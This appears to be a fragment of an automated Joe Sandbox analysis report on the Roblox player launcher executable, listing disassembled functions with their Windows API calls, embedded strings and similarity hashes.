              • GetSystemDefaultLCID.KERNEL32 ref: 008A8DCD
              Strings
              • unsigned int __thiscall crashpad::PEImageResourceReader::GetEntryFromResourceDirectoryByLanguage(unsigned int,unsigned short) const, xrefs: 008A8E55, 008A8F14
              • bool __thiscall crashpad::PEImageResourceReader::ReadResourceDirectory(unsigned int,struct _IMAGE_RESOURCE_DIRECTORY *,class std::vector<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY,class std::allocator<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY> > *,class std::vector<s, xrefs: 008A8C68, 008A8D1E
              • ../../../snapshot/win/pe_image_resource_reader.cc, xrefs: 008A8C63, 008A8D19, 008A8E50, 008A8F0F
              • in , xrefs: 008A8F2F
              • expected non-directory for entry language , xrefs: 008A8F03
              • could not read resource directory from , xrefs: 008A8C57
              • could not read resource directory ID entries from , xrefs: 008A8D0D
              • expected non-directory for entry in , xrefs: 008A8E44
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Default$LocaleSystemThreadUser
              • String ID: in $../../../snapshot/win/pe_image_resource_reader.cc$bool __thiscall crashpad::PEImageResourceReader::ReadResourceDirectory(unsigned int,struct _IMAGE_RESOURCE_DIRECTORY *,class std::vector<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY,class std::allocator<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY> > *,class std::vector<s$could not read resource directory ID entries from $could not read resource directory from $expected non-directory for entry in $expected non-directory for entry language $unsigned int __thiscall crashpad::PEImageResourceReader::GetEntryFromResourceDirectoryByLanguage(unsigned int,unsigned short) const
              • API String ID: 3126616036-1481966931
              • Opcode ID: 5cf572a6f8b62479b0517bebba730ce1bc66192bb18f57264d49ceed89d79bff
              • Instruction ID: 3f03bb818549841d336d40861ce8989ed799571551f6c6e8eab49c9a59ab7d61
              • Opcode Fuzzy Hash: 5cf572a6f8b62479b0517bebba730ce1bc66192bb18f57264d49ceed89d79bff
              • Instruction Fuzzy Hash: F4C11671A00208EBEF14EF68DC46FAE7765FF45310F044668F955E76C2EB74AA408BA1
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00731C5A
              • std::_Lockit::_Lockit.LIBCPMT ref: 00731C78
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00731C98
              • std::_Facet_Register.LIBCPMT ref: 00731E07
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00731E1F
              • Concurrency::cancel_current_task.LIBCPMT ref: 00731E37
              • Concurrency::cancel_current_task.LIBCPMT ref: 00731E3C
              • Concurrency::cancel_current_task.LIBCPMT ref: 00731E41
                • Part of subcall function 0072DE70: ___std_exception_copy.LIBVCRUNTIME ref: 0072DEAC
                • Part of subcall function 0072DE70: ___std_exception_destroy.LIBVCRUNTIME ref: 0072DED7
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register___std_exception_copy___std_exception_destroy
              • String ID: argument not found$false$true
              • API String ID: 1338633224-2625561180
              • Opcode ID: b0fdc79813583d9f0675268036d2a28da38c5951986f76c7bb12c01e6f466ee1
              • Instruction ID: d0b142e9ec8a361a2e6f329e1fb9a7ca3ee6dff9aa09ef08641338732dea2edb
              • Opcode Fuzzy Hash: b0fdc79813583d9f0675268036d2a28da38c5951986f76c7bb12c01e6f466ee1
              • Instruction Fuzzy Hash: DF81A075900208DFEB21DFA4D981BAEBBB8FF44710F14816DE805A7342E735AE45CBA1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 3f09c499fbb383128508450efc34b7a4a154dfb26fe19aef6808d70e516395c0
              • Instruction ID: 3aabf943a40892e54dfa0af96d9c2150c8eb15e2aae399ddfb1ae9feb47bc879
              • Opcode Fuzzy Hash: 3f09c499fbb383128508450efc34b7a4a154dfb26fe19aef6808d70e516395c0
              • Instruction Fuzzy Hash: 8771C075A01214EFEB20CF98D985BADB7E8FF48310F14816AE9199B352D7B5ED00CB90
              APIs
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,00000000,SOFTWARE\Classes\,00000011,00000000,-00000002), ref: 00771772
              • RegOpenKeyExW.ADVAPI32(00000000,shell\open\command,00000000,00020019,?), ref: 0077183C
              • RegCloseKey.ADVAPI32(00000000), ref: 0077184B
              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 0077187D
              • RegCloseKey.ADVAPI32(00000000), ref: 007718B8
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CloseOpen$QueryValue
              • String ID: %ws$SOFTWARE\Classes\$shell\open\command
              • API String ID: 3523390698-3896999985
              • Opcode ID: 3a681cc0349f6b06234af7050bda457c3cc03b709e7553422da63d381a1f01f3
              • Instruction ID: 6df5d745cc3ff65884d254a5d200ea12bf8a52ef75bf1cd2a60efe8f670a58fe
              • Opcode Fuzzy Hash: 3a681cc0349f6b06234af7050bda457c3cc03b709e7553422da63d381a1f01f3
              • Instruction Fuzzy Hash: 0502C171900218DFDF14DFA8CC44BEEB7B8BF49314F548199E409E7291E774AA45CBA1
              APIs
              • ___std_exception_copy.LIBVCRUNTIME ref: 0072DEAC
              • ___std_exception_destroy.LIBVCRUNTIME ref: 0072DED7
              • SetLastError.KERNEL32(00000000,?,?), ref: 0072DF43
              • FindWindowW.USER32(WindowsClient,00000000), ref: 0072DF57
              • GetLastError.KERNEL32 ref: 0072DFB6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast$FindWindow___std_exception_copy___std_exception_destroy
              • String ID: WindowsClient
              • API String ID: 2222484027-2638054540
              • Opcode ID: 7842aa7b67e214c93d8ee2eb960fba81c986d0f6b24f3e9b7122c9a2c87f31be
              • Instruction ID: 7777b91207357c86946f478888cd860928c0594dcbfd5e8e9e05e51c7855e802
              • Opcode Fuzzy Hash: 7842aa7b67e214c93d8ee2eb960fba81c986d0f6b24f3e9b7122c9a2c87f31be
              • Instruction Fuzzy Hash: 83D10375D002189FDB14CF98E845BEEBBF5FB89310F14826AE805A7391D779AD04CBA1
              APIs
              • PathFileExistsW.SHLWAPI(?,?,?,00000000,?,?), ref: 007375C9
              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?), ref: 00737706
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000,?,?), ref: 00737719
              • GetFileAttributesW.KERNEL32(?,?,?,00000000,?,?), ref: 00737737
                • Part of subcall function 0071B130: ___std_exception_copy.LIBVCRUNTIME ref: 0071B163
              • GetLastError.KERNEL32(00000000,?,?,00000000,?,?), ref: 007377E2
              Strings
              • Path {} is not a directory, xrefs: 0073779C
              • Failed to get attribute of {}, xrefs: 0073775C
              • Failed to create directory {}, error: {}, xrefs: 00737813
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFileLast$AttributesCreateDirectoryExistsPath___std_exception_copy
              • String ID: Failed to create directory {}, error: {}$Failed to get attribute of {}$Path {} is not a directory
              • API String ID: 3693151422-1360415715
              • Opcode ID: 9af844b44b07e114f364112909b7c43fd8a940e53460bb2158786da2ed812829
              • Instruction ID: f85bbd99c910ab19a855e31805a355114c437c3e79bb41f37b45c9705eee750a
              • Opcode Fuzzy Hash: 9af844b44b07e114f364112909b7c43fd8a940e53460bb2158786da2ed812829
              • Instruction Fuzzy Hash: 908129B1904608EBDF24DFACDC4ABEE77B8BB05314F500568F511A72D2E7789A04CB61
              APIs
              • FormatMessageW.KERNEL32(00001300,00000000,?,00000000), ref: 0073CBB2
              • LocalFree.KERNEL32(00000000,00000000,-00000002,?), ref: 0073CCD3
              Strings
              • Success, xrefs: 0073CC67
              • Unknown error 0x%8.8x, xrefs: 0073CC47
              • A connection with the server could not be established, xrefs: 0073CC1A
              • The operation timed out, xrefs: 0073CBFA
              • An error occurred in the secure channel support, xrefs: 0073CC87
              • The server name or address could not be resolved, xrefs: 0073CBDA
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FormatFreeLocalMessage
              • String ID: A connection with the server could not be established$An error occurred in the secure channel support$Success$The operation timed out$The server name or address could not be resolved$Unknown error 0x%8.8x
              • API String ID: 1427518018-2351849574
              • Opcode ID: f3079a4e46bf1091fff146ae0d5e429107735f496e2fdd1d87362b0fa09d33e4
              • Instruction ID: 81eb04d0865766fe52c4c46b934a3d757f98dc340b837d5accb3d8edbf53920b
              • Opcode Fuzzy Hash: f3079a4e46bf1091fff146ae0d5e429107735f496e2fdd1d87362b0fa09d33e4
              • Instruction Fuzzy Hash: 4761237AB00119ABEB25DF1CEC45BBDB765FB84714F04456AFD09A7382D779680087E0
              APIs
              • RegCloseKey.ADVAPI32(00000000), ref: 00768039
              • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 0076811C
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00768131
              • RegCloseKey.ADVAPI32(00000000), ref: 00768189
              • RegCloseKey.ADVAPI32(00000000), ref: 0076823B
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Close$AddressHandleModuleProc
              • String ID: Advapi32.dll$RegOpenKeyTransactedW$version
              • API String ID: 1193707174-3018907180
              • Opcode ID: 129cbea0bc6008044a79be5e19e12a3810ca3e2ae2e1361d28e4eb9abeb7fcdf
              • Instruction ID: c010a5b868cd50c7dbb35d07d5f4b7b16d626be2ac2da7b49eee40c667613e92
              • Opcode Fuzzy Hash: 129cbea0bc6008044a79be5e19e12a3810ca3e2ae2e1361d28e4eb9abeb7fcdf
              • Instruction Fuzzy Hash: 1B81B074A00249AFEF24CF58DC18BAEB7F5FB45304F04461DEC02A7291EBB99944CB62
              APIs
              • std::locale::_Init.LIBCPMT ref: 0072BCA5
                • Part of subcall function 009E230C: __EH_prolog3.LIBCMT ref: 009E2313
                • Part of subcall function 009E230C: std::_Lockit::_Lockit.LIBCPMT ref: 009E231E
                • Part of subcall function 009E230C: std::locale::_Setgloballocale.LIBCPMT ref: 009E2339
                • Part of subcall function 009E230C: std::_Lockit::~_Lockit.LIBCPMT ref: 009E238F
              • std::ios_base::failure::failure.LIBCPMT ref: 0072BD7D
              • OpenEventW.KERNEL32(00000002,00000000,?,ios_base::failbit set), ref: 0072BE2D
              • SetEvent.KERNEL32(00000000), ref: 0072BE3E
              • CloseHandle.KERNEL32(00000000), ref: 0072BE4E
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: EventLockitstd::_std::locale::_$CloseH_prolog3HandleInitLockit::_Lockit::~_OpenSetgloballocalestd::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2664175911-1866435925
              • Opcode ID: 6f4e6281325624d7959ba6697ac421d194dd5377676c0ccd68da04a3066a30c8
              • Instruction ID: bae11666b4ed7e6eb72b146ceadb5c9a5674e4582d1d91022ff828b13640e665
              • Opcode Fuzzy Hash: 6f4e6281325624d7959ba6697ac421d194dd5377676c0ccd68da04a3066a30c8
              • Instruction Fuzzy Hash: 2F6165B5A00714DFDB20DF58E845BABBBF5FB84300F04461DE84697791DBBAA804CB91
              APIs
                • Part of subcall function 00A28D00: InitializeCriticalSectionAndSpinCount.KERNEL32(?,000007D0,?,008B074C,00000000,00000000,?), ref: 00A28D09
              • RegisterWaitForSingleObject.KERNEL32(?,?,?,?,000000FF,00000000), ref: 008B07C0
              • RegisterWaitForSingleObject.KERNEL32(0CCCCCCC,?,?,?,000000FF,00000000), ref: 008B0807
              • RegisterWaitForSingleObject.KERNEL32(FFFFFFFF,?,?,?,000000FF,00000008), ref: 008B0851
                • Part of subcall function 00A281C0: OutputDebugStringW.KERNEL32(00000000), ref: 00A28106
              Strings
              • RegisterWaitForSingleObject crash dump requested, xrefs: 008B07C6
              • RegisterWaitForSingleObject non-crash dump requested, xrefs: 008B080D
              • ../../../util/win/exception_handler_server.cc, xrefs: 008B07D2, 008B0819, 008B0863
              • RegisterWaitForSingleObject process end, xrefs: 008B0857
              • void __thiscall crashpad::internal::ClientData::RegisterThreadPoolWaits(void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char)), xrefs: 008B07D7, 008B081E, 008B0868
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ObjectRegisterSingleWait$CountCriticalDebugInitializeOutputSectionSpinString
              • String ID: ../../../util/win/exception_handler_server.cc$RegisterWaitForSingleObject crash dump requested$RegisterWaitForSingleObject non-crash dump requested$RegisterWaitForSingleObject process end$void __thiscall crashpad::internal::ClientData::RegisterThreadPoolWaits(void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char))
              • API String ID: 4220453299-3490542302
              • Opcode ID: ea4651e5840127e34ad0c69fa3b0e6f7f25597a66107fc0fded3a2a4e909cb67
              • Instruction ID: dfedc09623c86e939ade7fd6c01f68e33ac243e1e7ffd84a6c92ef576d1257fb
              • Opcode Fuzzy Hash: ea4651e5840127e34ad0c69fa3b0e6f7f25597a66107fc0fded3a2a4e909cb67
              • Instruction Fuzzy Hash: B5514AB1604309ABDB60EF68DC42F8BBBE4BB05750F004628F859D76D1EB71EA44CB91
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
              • String ID:
              • API String ID: 3943753294-0
              • Opcode ID: 4c621b4b1ac2c4bd85eca08a97820d41679f24dc81d463966a3aa952a5656657
              • Instruction ID: f001e908701903cdce9d3da62621ab90326a6b9902c5eac8d5fe730fdab82e57
              • Opcode Fuzzy Hash: 4c621b4b1ac2c4bd85eca08a97820d41679f24dc81d463966a3aa952a5656657
              • Instruction Fuzzy Hash: 6551B234900296DFCF12DF66C985AADB7F8FF48311B24855AE8069B251DB70EE81CF91
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 33c6081ac6c0315c2dabb27909fee7860a886e695fe7b4a3fe0857d1aa77434f
              • Instruction ID: 2927ea30c321570a6613b871f20560784076270fe8c94c9339524e05cecf0cfb
              • Opcode Fuzzy Hash: 33c6081ac6c0315c2dabb27909fee7860a886e695fe7b4a3fe0857d1aa77434f
              • Instruction Fuzzy Hash: 1C71BD75A00218DFEB24CF68D845BAAB7F5EB88314F144628F905E7292D738A901CB90
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 008A874B
              Strings
              • could not read resource data entry from , xrefs: 008A88EC
              • ../../../snapshot/win/pe_image_resource_reader.cc, xrefs: 008A88F5
              • ios_base::badbit set, xrefs: 008A8722, 008A874A
              • ios_base::failbit set, xrefs: 008A872B
              • bool __thiscall crashpad::PEImageResourceReader::FindResourceByID(unsigned short,unsigned short,unsigned short,unsigned __int64 *,unsigned __int64 *,unsigned int *) const, xrefs: 008A88FA
              • ios_base::eofbit set, xrefs: 008A8730
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ../../../snapshot/win/pe_image_resource_reader.cc$bool __thiscall crashpad::PEImageResourceReader::FindResourceByID(unsigned short,unsigned short,unsigned short,unsigned __int64 *,unsigned __int64 *,unsigned int *) const$could not read resource data entry from $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-2312888652
              • Opcode ID: 4cdeb0d089e156bad87c3ce800da318a87714d94c36c2c8d05341523a4b5f194
              • Instruction ID: 8d010675247b657a44a8944c8008c33fdbcb8fd2e2cc0d26a21fef4fd8fde550
              • Opcode Fuzzy Hash: 4cdeb0d089e156bad87c3ce800da318a87714d94c36c2c8d05341523a4b5f194
              • Instruction Fuzzy Hash: 0C414A75A00215DFDB14DBA8C989EA9B7F4FF49304F1980A9E905DB762DB34ED40CB90
              APIs
              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00834CAB
              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?,00000104,00000000), ref: 00834D23
              • GetLastError.KERNEL32 ref: 00834D31
              • GetLastError.KERNEL32 ref: 00834DAA
              • GetLastError.KERNEL32 ref: 00834E7A
              • GetLastError.KERNEL32 ref: 00834FCB
              • CloseHandle.KERNEL32(00000000), ref: 0083505A
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast$Process$CloseFullHandleImageNameOpenQuery
              • String ID:
              • API String ID: 619744174-0
              • Opcode ID: db3c744fd584cd5252291b2467328c4e866cacf09cfe87d9a5ffe3e5af9b4753
              • Instruction ID: a197b7728d9571176faac705aab3fcfc5e2b2baeda94d60688c2dcf08eab1e26
              • Opcode Fuzzy Hash: db3c744fd584cd5252291b2467328c4e866cacf09cfe87d9a5ffe3e5af9b4753
              • Instruction Fuzzy Hash: B0C1AC71900208DFCF14DFA8D884BAEBBB1FF89314F184219E804EB291D775A946CBD1
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715C63
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715C86
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715CA6
              • std::_Facet_Register.LIBCPMT ref: 00715D0B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715D23
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
              • String ID: argument not found
              • API String ID: 459529453-3524968529
              • Opcode ID: edf23bfcde086b1dc660e8d8a63e8ef401bf203d5c116f4541a60368f5a62fc6
              • Instruction ID: ea55dd403f0e28749b61e0e5e4d6597c6ac9693dfd8df5a6b3bc86a6bcfebe58
              • Opcode Fuzzy Hash: edf23bfcde086b1dc660e8d8a63e8ef401bf203d5c116f4541a60368f5a62fc6
              • Instruction Fuzzy Hash: 4781C1B1D00619DBCB25DF58D985BEEBBB8FF44714F104259E908A7381E734AE84CB91
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 009F8B67
              • ___except_validate_context_record.LIBVCRUNTIME ref: 009F8B6F
              • _ValidateLocalCookies.LIBCMT ref: 009F8BF8
              • __IsNonwritableInCurrentImage.LIBCMT ref: 009F8C23
              • _ValidateLocalCookies.LIBCMT ref: 009F8C78
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 1170836740-1018135373
              • Opcode ID: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction ID: efaa541aab38a7c66667072498aab87d024001c8f2159e70eceae843f27a7984
              • Opcode Fuzzy Hash: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction Fuzzy Hash: 4041E434A0020DAFCF10DF68C895ABFBBB9EF45314F1480A5EA159B392DB31E951CB91
              APIs
              • GetLastError.KERNEL32 ref: 0073C38B
              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,?), ref: 0073C3D2
              • LocalAlloc.KERNEL32(00000000,00000040), ref: 0073C423
              • LocalFree.KERNEL32(?,-00000002,?,?,?,?,?), ref: 0073C4CD
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Local$AllocErrorFormatFreeLastMessage
              • String ID: IDispatch error #%d$Unknown error 0x%0lX
              • API String ID: 154589956-2934499512
              • Opcode ID: 9df955af1e7b590c49b4238e6520e0bcae5f8cb6d0b2a4775bb737adec151e9f
              • Instruction ID: 39c6d5b3f7056a871ff1997ff1255771aa52bf9b41c596834feaa73ca08e7219
              • Opcode Fuzzy Hash: 9df955af1e7b590c49b4238e6520e0bcae5f8cb6d0b2a4775bb737adec151e9f
              • Instruction Fuzzy Hash: EF41E6B8A003419BEB14DF58CC19BBEB7B5FF84B04F10855DE911B7291D7B96901CB90
              APIs
              • SHGetKnownFolderPath.SHELL32(?,?,00000000,?), ref: 007379EF
              • PathAddBackslashW.SHLWAPI(?,?,?), ref: 00737C99
                • Part of subcall function 0071E0F0: GetLastError.KERNEL32(0073CD66,00B314CC,0073CD66,?,0073CD66,80004005), ref: 0071E110
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Path$BackslashErrorFolderKnownLast
              • String ID: Bad result from SHGetKnownFolderPath=%x$\Roblox\$argument not found
              • API String ID: 3856291722-2833684437
              • Opcode ID: f6d6ade2c7287b1fd2bd1124aee26e046b16703de12c9566a1a475cbabfd2967
              • Instruction ID: c282eba123d1c5deb5f6178c3bd2b1646ec75a4d097bc8bc943017d022403203
              • Opcode Fuzzy Hash: f6d6ade2c7287b1fd2bd1124aee26e046b16703de12c9566a1a475cbabfd2967
              • Instruction Fuzzy Hash: ABE109B1D04249DBEB28DFA8CD45BEEF7B5FF44300F148119E845A7292DB38AA44CB60
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: File$DeleteErrorLastMove
              • String ID: %s.%d.TMP$ios_base::badbit set
              • API String ID: 3195829115-345462464
              • Opcode ID: 661a4526b1dec68fa47831b1ab8036c28736506a474ddfd4c24620d49ec9781a
              • Instruction ID: 67b3f7028a948aa181b01b10a6e655ac3d21d15a38ac13e52ca98f0fb5aaa23b
              • Opcode Fuzzy Hash: 661a4526b1dec68fa47831b1ab8036c28736506a474ddfd4c24620d49ec9781a
              • Instruction Fuzzy Hash: 42D1F631E002499FEF24CF68DC457EEBBB6FF45304F108219E415A7292E779A944CB91
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715AF9
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715B1B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715B3B
              • __Getctype.LIBCPMT ref: 00715BE2
              • std::_Facet_Register.LIBCPMT ref: 00715C0B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715C23
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
              • String ID:
              • API String ID: 1102183713-0
              • Opcode ID: 9946f53a8340a2706f475cbe8cde418cf782f1fd86b8030a2f20e5382f7bd56f
              • Instruction ID: b7fbf501dc82b20d6edeb423dbcb5209f3a2546a11cf2c322a24e54c9023d222
              • Opcode Fuzzy Hash: 9946f53a8340a2706f475cbe8cde418cf782f1fd86b8030a2f20e5382f7bd56f
              • Instruction Fuzzy Hash: 7941AFB1904655CBCB2ACF58C485BEEBBB4FF84710F148159E805AB381DB78AD81CBD1
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 00743FD1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-1866435925
              • Opcode ID: 1dbae672788842f65a1c5640c007fe7f348a54b1787eb9a35d71e06908d3aa2c
              • Instruction ID: 855186dca2f19867722eb8fbcf726e55afa3bf991d56fe297a66fcd563f97e61
              • Opcode Fuzzy Hash: 1dbae672788842f65a1c5640c007fe7f348a54b1787eb9a35d71e06908d3aa2c
              • Instruction Fuzzy Hash: 3AB17F74A00248DFDB04DF98C985BAEBBF5EF98304F248099E909AB352D736DD01CB91
              APIs
              • GetLastError.KERNEL32 ref: 0073ED5B
              • CopyFileW.KERNEL32(?,?,00000000), ref: 0073EE0B
              • MoveFileW.KERNEL32(?,?), ref: 0073EF79
                • Part of subcall function 008BC620: GetCurrentThreadId.KERNEL32 ref: 008BC760
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: File$CopyCurrentErrorLastMoveThread
              • String ID: %s: %S$:Zone.Identifier:$DATA
              • API String ID: 794519006-325868283
